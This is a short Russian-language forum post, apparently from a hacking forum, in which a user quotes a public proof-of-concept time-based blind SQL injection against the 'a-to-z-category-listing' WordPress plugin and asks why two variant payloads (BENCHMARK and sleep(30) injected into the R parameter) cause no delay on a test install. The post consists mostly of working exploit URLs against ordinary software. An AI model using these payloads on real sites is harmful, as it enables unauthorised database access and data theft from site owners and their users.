Показать сообщение отдельно

  #10  
Старый 09.12.2012, 16:07
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию

Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,

Плагин на exploit-db

Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20

Я запрашиваю:

1)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20

2)http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20

Какой либо задержки в обоих случаях не последовало.

Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
 
Ответить с цитированием